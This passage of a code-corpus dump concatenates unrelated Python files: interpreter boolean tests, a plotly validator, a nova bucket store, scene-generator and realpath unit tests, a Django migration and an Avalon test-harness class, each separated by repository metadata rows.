w_res = space.execute("return false & false")
assert w_res is space.w_false
def test_or(self, space):
w_res = space.execute("return false | 3")
assert w_res is space.w_true
w_res = space.execute("return false | nil")
assert w_res is space.w_false
def test_xor(self, space):
assert space.execute("return false ^ nil") is space.w_false
assert space.execute("return false ^ false") is space.w_false
assert space.execute("return false ^ true") is space.w_true
assert space.execute("return false ^ 1") is space.w_true
def test_singleton_class(self, space):
w_res = space.execute("return false.singleton_class == FalseClass")
assert w_res is space.w_true
| 34.872093 | 75 | 0.643881 |
8ee576696ac4780f959d152c8e7d1a4f298c87cf | 464 | py | Python | plotly/validators/layout/scene/yaxis/_zerolinecolor.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | ["MIT"] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/layout/scene/yaxis/_zerolinecolor.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | ["MIT"] | null | null | null | plotly/validators/layout/scene/yaxis/_zerolinecolor.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | ["MIT"] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z |
import _plotly_utils.basevalidators
class ZerolinecolorValidator(_plotly_utils.basevalidators.ColorValidator):
def __init__(
self,
plotly_name='zerolinecolor',
parent_name='layout.scene.yaxis',
**kwargs
):
super(ZerolinecolorValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='plot',
role='style',
**kwargs
)
| 24.421053 | 74 | 0.612069 |
61feb4a4c3a3e8695e2e6faf17cc54d324a1586c | 5,424 | py | Python | nova/objectstore/bucket.py | joshuamckenty/yolo-octo-wookie | 8e078e91d367f3deaf1785c46ee7734dd7907f24 | ["Apache-2.0"] | 1 | 2021-06-09T17:58:53.000Z | 2021-06-09T17:58:53.000Z | nova/objectstore/bucket.py | joshuamckenty/yolo-octo-wookie | 8e078e91d367f3deaf1785c46ee7734dd7907f24 | ["Apache-2.0"] | null | null | null | nova/objectstore/bucket.py | joshuamckenty/yolo-octo-wookie | 8e078e91d367f3deaf1785c46ee7734dd7907f24 | ["Apache-2.0"] | null | null | null |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Simple object store using Blobs and JSON files on disk.
"""
import datetime
import glob
import json
import os
import bisect
from nova import exception
from nova import flags
from nova import utils
from nova.objectstore import stored
FLAGS = flags.FLAGS
flags.DEFINE_string('buckets_path', utils.abspath('../buckets'),
'path to s3 buckets')
class Bucket(object):
def __init__(self, name):
self.name = name
self.path = os.path.abspath(os.path.join(FLAGS.buckets_path, name))
if not self.path.startswith(os.path.abspath(FLAGS.buckets_path)) or \
not os.path.isdir(self.path):
raise exception.NotFound()
self.ctime = os.path.getctime(self.path)
def __repr__(self):
return "<Bucket: %s>" % self.name
@staticmethod
def all():
""" list of all buckets """
buckets = []
for fn in glob.glob("%s/*.json" % FLAGS.buckets_path):
try:
json.load(open(fn))
name = os.path.split(fn)[-1][:-5]
buckets.append(Bucket(name))
except:
pass
return buckets
@staticmethod
def create(bucket_name, context):
"""Create a new bucket owned by a project.
@bucket_name: a string representing the name of the bucket to create
@context: a nova.auth.api.ApiContext object representing who owns the bucket.
Raises:
            NotAuthorized: if the bucket already exists or has an invalid name
"""
path = os.path.abspath(os.path.join(
FLAGS.buckets_path, bucket_name))
if not path.startswith(os.path.abspath(FLAGS.buckets_path)) or \
os.path.exists(path):
raise exception.NotAuthorized()
os.makedirs(path)
with open(path+'.json', 'w') as f:
json.dump({'ownerId': context.project.id}, f)
@property
def metadata(self):
""" dictionary of metadata around bucket,
keys are 'Name' and 'CreationDate'
"""
return {
"Name": self.name,
"CreationDate": datetime.datetime.utcfromtimestamp(self.ctime),
}
@property
def owner_id(self):
try:
with open(self.path+'.json') as f:
return json.load(f)['ownerId']
except:
return None
def is_authorized(self, context):
try:
return context.user.is_admin() or self.owner_id == context.project.id
        except Exception:
            pass
def list_keys(self, prefix='', marker=None, max_keys=1000, terse=False):
object_names = []
for root, dirs, files in os.walk(self.path):
for file_name in files:
object_names.append(os.path.join(root, file_name)[len(self.path)+1:])
object_names.sort()
contents = []
start_pos = 0
if marker:
start_pos = bisect.bisect_right(object_names, marker, start_pos)
if prefix:
start_pos = bisect.bisect_left(object_names, prefix, start_pos)
truncated = False
for object_name in object_names[start_pos:]:
if not object_name.startswith(prefix):
break
if len(contents) >= max_keys:
truncated = True
break
object_path = self._object_path(object_name)
c = {"Key": object_name}
if not terse:
info = os.stat(object_path)
c.update({
"LastModified": datetime.datetime.utcfromtimestamp(
info.st_mtime),
"Size": info.st_size,
})
contents.append(c)
marker = object_name
return {
"Name": self.name,
"Prefix": prefix,
"Marker": marker,
"MaxKeys": max_keys,
"IsTruncated": truncated,
"Contents": contents,
}
def _object_path(self, object_name):
fn = os.path.join(self.path, object_name)
if not fn.startswith(self.path):
raise exception.NotAuthorized()
return fn
def delete(self):
if len(os.listdir(self.path)) > 0:
raise exception.NotAuthorized()
os.rmdir(self.path)
os.remove(self.path+'.json')
def __getitem__(self, key):
return stored.Object(self, key)
def __setitem__(self, key, value):
with open(self._object_path(key), 'wb') as f:
f.write(value)
def __delitem__(self, key):
stored.Object(self, key).delete()
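# Illustrative usage sketch (not part of the original module); 'context' stands in for a
# nova.auth.api.ApiContext and the bucket/key names below are hypothetical.
def _bucket_example(context):
    Bucket.create('demo-bucket', context)        # creates <buckets_path>/demo-bucket (+ .json)
    bucket = Bucket('demo-bucket')
    bucket['hello.txt'] = b'hello world'         # stored beneath the bucket directory
    listing = bucket.list_keys(prefix='hello')
    return listing['Contents']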
| 30.818182 | 85 | 0.590892 |
27c898a6ba655b69e09c6e6206e0db767a8be15c | 19,391 | py | Python | tests/ile_structural_objects_component_test.py | NextCenturyCorporation/mcs-scene-generator | e0a6ee778359cadd2de682a5006581b7a6134431 | ["Apache-2.0"] | 4 | 2021-02-04T03:57:52.000Z | 2022-02-08T18:19:58.000Z | tests/ile_structural_objects_component_test.py | NextCenturyCorporation/mcs-scene-generator | e0a6ee778359cadd2de682a5006581b7a6134431 | ["Apache-2.0"] | 68 | 2021-05-06T08:52:46.000Z | 2022-03-23T16:46:03.000Z | tests/ile_structural_objects_component_test.py | NextCenturyCorporation/mcs-scene-generator | e0a6ee778359cadd2de682a5006581b7a6134431 | ["Apache-2.0"] | 1 | 2021-02-04T03:21:57.000Z | 2021-02-04T03:21:57.000Z |
from typing import List
from machine_common_sense.config_manager import Vector3d
from ideal_learning_env import RandomStructuralObjectsComponent
from ideal_learning_env.numerics import MinMaxFloat, VectorFloatConfig
from ideal_learning_env.structural_objects_component import (
RandomStructuralObjectConfig,
SpecificStructuralObjectsComponent,
StructuralLOccluderConfig,
StructuralPlatformConfig,
StructuralRampConfig,
StructuralWallConfig,
)
def prior_scene():
return {'debug': {}, 'goal': {}, 'performerStart':
{'position':
{'x': 0, 'y': 0, 'z': 0}},
'roomDimensions': {'x': 10, 'y': 3, 'z': 10}}
def test_random_structural_objects_defaults():
component = RandomStructuralObjectsComponent({})
assert component.random_structural_objects is None
scene = component.update_ile_scene(prior_scene())
objs = scene['objects']
assert isinstance(objs, list)
occluders = sum(1 for o in objs if o['id'].startswith('occluder'))
num_objs = len(objs) - occluders / 2
assert 2 <= num_objs <= 4
def test_random_structural_objects_num():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'num': 3
}
})
assert component.random_structural_objects.num == 3
assert component.random_structural_objects.type is None
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
occluders = sum(1 for o in objs if o['id'].startswith('occluder'))
assert len(objs) == 3 + occluders / 2
def test_random_structural_objects_min_max():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'num': {'min': 1, 'max': 4}
}
})
assert component.random_structural_objects.num.min == 1
assert component.random_structural_objects.num.max == 4
computed = component.get_random_structural_objects()
assert 1 <= computed[0].num <= 4
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects
occluders = sum(bool(o['id'].startswith('occluder')) for o in objs) / 2
min = 1 + occluders
max = 4 + occluders
assert min <= len(objs) <= max
for obj in objs:
assert obj['structure']
def test_random_structural_objects_walls():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'walls',
'num': 2
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.num == 2
assert component.random_structural_objects.type == 'walls'
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
assert len(objs) == 2
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('wall')
def test_random_structural_objects_platforms():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'platforms',
'num': {
'min': 1,
'max': 3
}
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.num.min == 1
assert component.random_structural_objects.num.max == 3
assert component.random_structural_objects.type == 'platforms'
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == 'platforms'
assert 1 <= computed[0].num <= 3
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
assert 1 <= len(objs) <= 3
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('platform')
def test_random_structural_objects_ramps():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'ramps',
'num': [0, 1, 2]
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.type == 'ramps'
assert component.random_structural_objects.num == [0, 1, 2]
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == 'ramps'
assert computed[0].num in [0, 1, 2]
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
assert len(objs) in [0, 1, 2]
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('ramp')
def test_random_structural_objects_l_occluders():
component = RandomStructuralObjectsComponent({
'random_structural_objects': {
'type': 'l_occluders',
'num': 2
}
})
assert isinstance(
component.random_structural_objects,
RandomStructuralObjectConfig)
assert component.random_structural_objects.type == 'l_occluders'
assert component.random_structural_objects.num == 2
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == 'l_occluders'
assert computed[0].num == 2
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects each
assert len(objs) == 4
for obj in objs:
assert obj['structure']
assert obj['id'].startswith('occluder')
def test_random_structural_objects_all():
# This is minimized for all to avoid rare failures due to big objects
# coming early and causing the test to fail.
component = RandomStructuralObjectsComponent({
'random_structural_objects': [{
'type': 'walls',
'num': {'min': 1, 'max': 1}
}, {
'type': 'platforms',
'num': 1
}, {
'type': 'ramps',
'num': 1
}, {
'type': 'l_occluders',
'num': 1
}]
})
assert isinstance(
component.random_structural_objects, List)
assert component.random_structural_objects[0].num.min == 1
assert component.random_structural_objects[0].num.max == 1
assert component.random_structural_objects[0].type == "walls"
assert component.random_structural_objects[1].num == 1
assert component.random_structural_objects[1].type == "platforms"
assert component.random_structural_objects[2].num == 1
assert component.random_structural_objects[2].type == "ramps"
assert component.random_structural_objects[3].num == 1
assert component.random_structural_objects[3].type == "l_occluders"
computed = component.get_random_structural_objects()
assert isinstance(computed, List)
assert computed[0].type == "walls"
assert computed[0].num == 1
assert computed[1].type == "platforms"
assert computed[1].num == 1
assert computed[2].type == "ramps"
assert computed[2].num == 1
assert computed[3].type == "l_occluders"
assert computed[3].num == 1
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects each
assert len(objs) == 5
wall = 0
plat = 0
ramp = 0
occ = 0
for obj in objs:
assert obj['structure']
if obj['id'].startswith('wall'):
wall += 1
if obj['id'].startswith('platform'):
plat += 1
if obj['id'].startswith('ramp'):
ramp += 1
if obj['id'].startswith('occluder'):
occ += 1
occ /= 2
assert wall == 1
assert plat == 1
assert ramp == 1
assert occ == 1
def test_structural_objects_defaults():
component = SpecificStructuralObjectsComponent({})
assert component.structural_walls is None
assert component.structural_platforms is None
assert component.structural_l_occluders is None
assert component.structural_ramps is None
scene = component.update_ile_scene(prior_scene())
objs = scene['objects']
assert isinstance(objs, list)
assert len(objs) == 0
def test_structural_objects_walls_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_walls': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'width': 1,
'height': 1
}
})
pre_walls = component.structural_walls
assert isinstance(pre_walls, StructuralWallConfig)
assert pre_walls.num == 1
assert isinstance(pre_walls.position, VectorFloatConfig)
assert pre_walls.position.x == 1
assert pre_walls.position.z == 3
assert pre_walls.rotation_y == 30
assert pre_walls.material == my_mats
assert pre_walls.width == 1
assert pre_walls.height == 1
# computed walls
cwalls = component.get_structural_walls()
assert isinstance(cwalls, StructuralWallConfig)
assert cwalls.num == 1
assert isinstance(cwalls.position, Vector3d)
assert cwalls.position.x == 1
assert cwalls.position.z == 3
assert cwalls.rotation_y == 30
assert isinstance(cwalls.material, str)
assert cwalls.material in my_mats
assert cwalls.width == 1
assert cwalls.height == 1
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert pos['x'] == 1
assert pos['z'] == 3
assert rot['y'] == 30
def test_structural_objects_walls_empty():
component = SpecificStructuralObjectsComponent({
'structural_walls': {
'num': 1
}
})
pre_walls = component.structural_walls
assert isinstance(pre_walls, StructuralWallConfig)
assert pre_walls.num == 1
assert pre_walls.position is None
assert pre_walls.material is None
assert pre_walls.material is None
assert pre_walls.width is None
assert pre_walls.height is None
# computed walls
cwalls = component.get_structural_walls()
assert isinstance(cwalls, StructuralWallConfig)
assert cwalls.num == 1
assert cwalls.position is None
assert cwalls.material is None
assert cwalls.width is None
assert cwalls.height is None
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert isinstance(pos, dict)
assert isinstance(rot, dict)
assert isinstance(obj['materials'], list)
assert isinstance(pos['x'], float)
assert isinstance(pos['z'], float)
assert isinstance(rot['y'], int)
def test_structural_objects_platforms_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_platforms': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'scale': {
'x': 0.4,
'y': 0.5,
'z': 0.6
}
}
})
pre_plat = component.structural_platforms
assert isinstance(pre_plat, StructuralPlatformConfig)
assert pre_plat.num == 1
assert isinstance(pre_plat.position, VectorFloatConfig)
assert pre_plat.position.x == 1
assert pre_plat.position.z == 3
assert pre_plat.rotation_y == 30
assert pre_plat.material == my_mats
scale = pre_plat.scale
assert isinstance(scale, VectorFloatConfig)
assert scale.x == .4
assert scale.y == .5
assert scale.z == .6
# computed walls
cplat = component.get_structural_platforms()
assert isinstance(cplat, StructuralPlatformConfig)
assert cplat.num == 1
assert isinstance(cplat.position, Vector3d)
assert cplat.position.x == 1
assert cplat.position.z == 3
assert cplat.rotation_y == 30
assert isinstance(cplat.material, str)
assert cplat.material in my_mats
scale = cplat.scale
assert isinstance(scale, Vector3d)
assert scale.x == .4
assert scale.y == .5
assert scale.z == .6
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert pos['x'] == 1
assert pos['z'] == 3
assert rot['y'] == 30
def test_structural_objects_platforms_variables():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_platforms': {
'num': 1,
'position': {
'x': {
'min': -4,
'max': 4
},
'y': 2,
'z': [-3, 0, 3]
},
'rotation_y': 30,
'material': my_mats,
'scale': {
'min': 0.2,
'max': 1.5
}
}
})
pre_plat = component.structural_platforms
assert isinstance(pre_plat, StructuralPlatformConfig)
assert pre_plat.num == 1
assert isinstance(pre_plat.position, VectorFloatConfig)
assert pre_plat.position.x == MinMaxFloat(min=-4, max=4)
assert pre_plat.position.z == [-3, 0, 3]
assert pre_plat.rotation_y == 30
assert pre_plat.material == my_mats
scale = pre_plat.scale
assert scale == MinMaxFloat(min=0.2, max=1.5)
# computed walls
cplat = component.get_structural_platforms()
assert isinstance(cplat, StructuralPlatformConfig)
assert cplat.num == 1
assert isinstance(cplat.position, Vector3d)
assert -4 <= cplat.position.x <= 4
assert cplat.position.z in [-3, 0, 3]
assert cplat.rotation_y == 30
assert isinstance(cplat.material, str)
assert cplat.material in my_mats
scale = cplat.scale
assert 0.2 <= scale <= 1.5
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
rot = show['rotation']
scale = show['scale']
assert rot['y'] == 30
assert 0.2 <= scale['x'] <= 1.5
assert 0.2 <= scale['y'] <= 1.5
assert 0.2 <= scale['z'] <= 1.5
def test_structural_objects_l_occluders_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_l_occluders': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'scale_front_x': 0.3,
'scale_front_z': 0.4,
'scale_side_x': 0.5,
'scale_side_z': 0.6,
'scale_y': 0.7
}
})
pre_occ = component.structural_l_occluders
assert isinstance(pre_occ, StructuralLOccluderConfig)
assert pre_occ.num == 1
assert isinstance(pre_occ.position, VectorFloatConfig)
assert pre_occ.position.x == 1
assert pre_occ.position.z == 3
assert pre_occ.rotation_y == 30
assert pre_occ.material == my_mats
assert pre_occ.scale_front_x == .3
assert pre_occ.scale_front_z == .4
assert pre_occ.scale_side_x == .5
assert pre_occ.scale_side_z == .6
assert pre_occ.scale_y == .7
# computed occluder
comp_occ = component.get_structural_l_occluders()
assert isinstance(comp_occ, StructuralLOccluderConfig)
assert comp_occ.num == 1
assert isinstance(comp_occ.position, Vector3d)
assert comp_occ.position.x == 1
assert comp_occ.position.z == 3
assert comp_occ.rotation_y == 30
assert isinstance(comp_occ.material, str)
assert comp_occ.material in my_mats
assert comp_occ.scale_front_x == .3
assert comp_occ.scale_front_z == .4
assert comp_occ.scale_side_x == .5
assert comp_occ.scale_side_z == .6
assert comp_occ.scale_y == .7
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 2
for obj in objs:
assert obj['structure']
show = obj['shows'][0]
rot = show['rotation']
assert rot['y'] == 30
def test_structural_objects_ramps_full():
my_mats = [
"PLASTIC_MATERIALS",
"AI2-THOR/Materials/Metals/Brass 1"
]
component = SpecificStructuralObjectsComponent({
'structural_ramps': {
'num': 1,
'position': {
'x': 1,
'y': 2,
'z': 3
},
'rotation_y': 30,
'material': my_mats,
'angle': 30,
'width': 0.4,
'length': 0.5
}
})
pre_ramp = component.structural_ramps
assert isinstance(pre_ramp, StructuralRampConfig)
assert pre_ramp.num == 1
assert isinstance(pre_ramp.position, VectorFloatConfig)
assert pre_ramp.position.x == 1
assert pre_ramp.position.z == 3
assert pre_ramp.rotation_y == 30
assert pre_ramp.material == my_mats
assert pre_ramp.angle == 30
assert pre_ramp.width == .4
assert pre_ramp.length == .5
# computed ramps
cramp = component.get_structural_ramps()
assert isinstance(cramp, StructuralRampConfig)
assert cramp.num == 1
assert isinstance(cramp.position, Vector3d)
assert cramp.position.x == 1
assert cramp.position.z == 3
assert cramp.rotation_y == 30
assert isinstance(cramp.material, str)
assert cramp.material in my_mats
assert cramp.angle == 30
assert cramp.width == .4
assert cramp.length == .5
scene = component.update_ile_scene(prior_scene())
assert isinstance(scene['objects'], list)
objs = scene['objects']
# occluders create 2 objects.
assert len(objs) == 1
obj = objs[0]
assert obj['structure']
show = obj['shows'][0]
pos = show['position']
rot = show['rotation']
assert pos['x'] == 1
assert pos['z'] == 3
assert rot['y'] == 30
| 31.225443 | 75 | 0.627972 |
300aab92ae8a2974060e5356ec5d2e2e0b92bb38 | 1,318 | py | Python | django/api/migrations/0003_vindecodedinformation.py | emi-hi/cthub | 6e1da9d4e0d0b6037177854de9bb5df1746c848d | ["Apache-2.0"] | 1 | 2021-12-05T22:11:20.000Z | 2021-12-05T22:11:20.000Z | django/api/migrations/0003_vindecodedinformation.py | emi-hi/cthub | 6e1da9d4e0d0b6037177854de9bb5df1746c848d | ["Apache-2.0"] | 5 | 2021-09-24T16:54:38.000Z | 2022-01-22T22:08:38.000Z | django/api/migrations/0003_vindecodedinformation.py | emi-hi/cthub | 6e1da9d4e0d0b6037177854de9bb5df1746c848d | ["Apache-2.0"] | 2 | 2021-10-19T17:26:34.000Z | 2021-12-05T22:12:56.000Z |
# Generated by Django 3.1.6 on 2021-11-15 19:20
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_ldvrebates'),
]
operations = [
migrations.CreateModel(
name='VINDecodedInformation',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_timestamp', models.DateTimeField(auto_now_add=True, null=True)),
('create_user', models.CharField(default='SYSTEM', max_length=130)),
('update_timestamp', models.DateTimeField(auto_now=True, null=True)),
('update_user', models.CharField(max_length=130, null=True)),
('manufacturer', models.CharField(blank=True, max_length=500, null=True)),
('make', models.CharField(blank=True, max_length=250, null=True)),
('model', models.CharField(blank=True, max_length=250, null=True)),
('model_year', models.IntegerField(blank=True, null=True)),
('fuel_type_primary', models.CharField(blank=True, max_length=250, null=True)),
],
options={
'db_table': 'vin_decoded_information',
},
),
]
| 41.1875 | 114 | 0.594082 |
2ee9db30af2627889b67adc650b16c5bd685390d | 23 | py | Python | dataview/__init__.py | srkama/haysolr | 0195f5fc113e416a4cabf3f5ceb1ba55901e4aaa | ["Apache-2.0"] | null | null | null | dataview/__init__.py | srkama/haysolr | 0195f5fc113e416a4cabf3f5ceb1ba55901e4aaa | ["Apache-2.0"] | null | null | null | dataview/__init__.py | srkama/haysolr | 0195f5fc113e416a4cabf3f5ceb1ba55901e4aaa | ["Apache-2.0"] | null | null | null |
__author__ = 'Kamal.S'
| 11.5 | 22 | 0.695652 |
e0eb8134a903c1d15547fc9ccf8fa66a7d8eeb28 | 3,312 | py | Python | layers/poky/meta/lib/oeqa/selftest/cases/oelib/path.py | dtischler/px30-test | 55dce0b7aff1c4a7dea3ac94f94cc9c67fba7c9f | ["Apache-2.0"] | 1 | 2020-09-10T02:47:54.000Z | 2020-09-10T02:47:54.000Z | layers/poky/meta/lib/oeqa/selftest/cases/oelib/path.py | dtischler/px30-test | 55dce0b7aff1c4a7dea3ac94f94cc9c67fba7c9f | ["Apache-2.0"] | 3 | 2019-11-20T02:53:01.000Z | 2019-12-26T03:00:15.000Z | layers/poky/meta/lib/oeqa/selftest/cases/oelib/path.py | dtischler/px30-test | 55dce0b7aff1c4a7dea3ac94f94cc9c67fba7c9f | ["Apache-2.0"] | null | null | null |
from unittest.case import TestCase
import oe, oe.path
import tempfile
import os
import errno
import shutil
class TestRealPath(TestCase):
DIRS = [ "a", "b", "etc", "sbin", "usr", "usr/bin", "usr/binX", "usr/sbin", "usr/include", "usr/include/gdbm" ]
FILES = [ "etc/passwd", "b/file" ]
LINKS = [
( "bin", "/usr/bin", "/usr/bin" ),
( "binX", "usr/binX", "/usr/binX" ),
( "c", "broken", "/broken" ),
( "etc/passwd-1", "passwd", "/etc/passwd" ),
( "etc/passwd-2", "passwd-1", "/etc/passwd" ),
( "etc/passwd-3", "/etc/passwd-1", "/etc/passwd" ),
( "etc/shadow-1", "/etc/shadow", "/etc/shadow" ),
( "etc/shadow-2", "/etc/shadow-1", "/etc/shadow" ),
( "prog-A", "bin/prog-A", "/usr/bin/prog-A" ),
( "prog-B", "/bin/prog-B", "/usr/bin/prog-B" ),
( "usr/bin/prog-C", "../../sbin/prog-C", "/sbin/prog-C" ),
( "usr/bin/prog-D", "/sbin/prog-D", "/sbin/prog-D" ),
( "usr/binX/prog-E", "../sbin/prog-E", None ),
( "usr/bin/prog-F", "../../../sbin/prog-F", "/sbin/prog-F" ),
( "loop", "a/loop", None ),
( "a/loop", "../loop", None ),
( "b/test", "file/foo", "/b/file/foo" ),
]
LINKS_PHYS = [
( "./", "/", "" ),
( "binX/prog-E", "/usr/sbin/prog-E", "/sbin/prog-E" ),
]
EXCEPTIONS = [
( "loop", errno.ELOOP ),
( "b/test", errno.ENOENT ),
]
def setUp(self):
self.tmpdir = tempfile.mkdtemp(prefix = "oe-test_path")
self.root = os.path.join(self.tmpdir, "R")
os.mkdir(os.path.join(self.tmpdir, "_real"))
os.symlink("_real", self.root)
for d in self.DIRS:
os.mkdir(os.path.join(self.root, d))
for f in self.FILES:
open(os.path.join(self.root, f), "w")
for l in self.LINKS:
os.symlink(l[1], os.path.join(self.root, l[0]))
def tearDown(self):
shutil.rmtree(self.tmpdir)
def __realpath(self, file, use_physdir, assume_dir = True):
return oe.path.realpath(os.path.join(self.root, file), self.root,
use_physdir, assume_dir = assume_dir)
def test_norm(self):
for l in self.LINKS:
if l[2] == None:
continue
target_p = self.__realpath(l[0], True)
target_l = self.__realpath(l[0], False)
if l[2] != False:
self.assertEqual(target_p, target_l)
self.assertEqual(l[2], target_p[len(self.root):])
def test_phys(self):
for l in self.LINKS_PHYS:
target_p = self.__realpath(l[0], True)
target_l = self.__realpath(l[0], False)
self.assertEqual(l[1], target_p[len(self.root):])
self.assertEqual(l[2], target_l[len(self.root):])
def test_loop(self):
for e in self.EXCEPTIONS:
self.assertRaisesRegex(OSError, r'\[Errno %u\]' % e[1],
self.__realpath, e[0], False, False)
| 38.511628 | 115 | 0.46407 |
f3085e09e1f88e6c5aa48fd2a714a6fbd88c42ac | 3,953 | py | Python | tests/automation_framework/src/libs/test_base.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | ["Apache-2.0"] | null | null | null | tests/automation_framework/src/libs/test_base.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | ["Apache-2.0"] | null | null | null | tests/automation_framework/src/libs/test_base.py | shresthichauhan/trusted-compute-framework | 1ad89fa6fa4492f43bb79e1c9be3536c4f0ff7f7 | ["Apache-2.0"] | null | null | null |
from src.libs.avalon_test_wrapper \
import build_request_obj, read_json, submit_request, \
pre_test_env
import logging
import globals
from src.libs.direct_listener import ListenerImpl
from src.libs.direct_sdk import SDKImpl
from src.libs import constants
logger = logging.getLogger(__name__)
class TestBase():
def __init__(self):
self.uri_client = globals.uri_client
self.build_request_output = {}
def setup_and_build_request_lookup(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(input_file)
self.build_request_output.update({'request_obj': request_obj})
return 0
def setup_and_build_request_wo_submit(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_output=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def setup_and_build_request_retrieve(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_response=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def setup_and_build_request_receipt(self, input_file):
pre_test_output, wo_submit = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_output=pre_test_output,
pre_test_response=wo_submit)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def setup_and_build_request_receipt_retrieve(self, input_file):
pre_test_output, wo_submit = pre_test_env(input_file)
logger.info("***Pre test output*****\n%s\n", pre_test_output)
logger.info("***wo_submit*****\n%s\n", wo_submit)
# submit_request = json.loads(wo_submit)
result_response = self.getresult(wo_submit)
request_obj, action_obj = build_request_obj(
input_file, pre_test_output=pre_test_output,
pre_test_response=wo_submit)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
return 0
def teardown(self):
logger.info("**No Teardown Defined**\n%s\n")
def setup_and_build_request_worker_update(self, input_file):
pre_test_output = pre_test_env(input_file)
request_obj, action_obj = build_request_obj(
input_file, pre_test_response=pre_test_output)
self.build_request_output.update(
{'request_obj': request_obj,
'pre_test_output': pre_test_output,
'action_obj': action_obj})
